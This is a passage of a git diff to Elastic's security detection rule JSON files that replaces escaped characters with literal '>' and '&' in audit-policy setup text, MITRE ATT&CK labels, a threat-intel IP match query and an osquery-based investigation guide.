f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json index a1cb9ada44e..ffd4bbe09a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_107.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json index 347cc8ecd02..02733ca2348 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_108.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", - "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", + "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json index a3be391be02..283a616baf8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_1.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json index 17aa96ab23a..f8f572ca12e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_2.json @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json index a4780d01ffb..13a02245a52 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json +++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_3.json @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json index cd5e273cf1b..4bf6c953fa5 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_4.json @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json index 243cb99c9ba..651205f552b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json index 461ea8e2603..383d0bf7b93 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_1.json @@ -128,7 +128,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json index 48c9b22601f..8079f75f81f 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_2.json @@ -130,7 +130,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json index bb90304d7d1..544c93a2aa4 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json +++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_3.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel IP Address Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "source.ip:* or destination.ip:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -130,7 +130,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json index 8a6e8aa15f6..ad4018241c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_4.json @@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel IP Address Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a 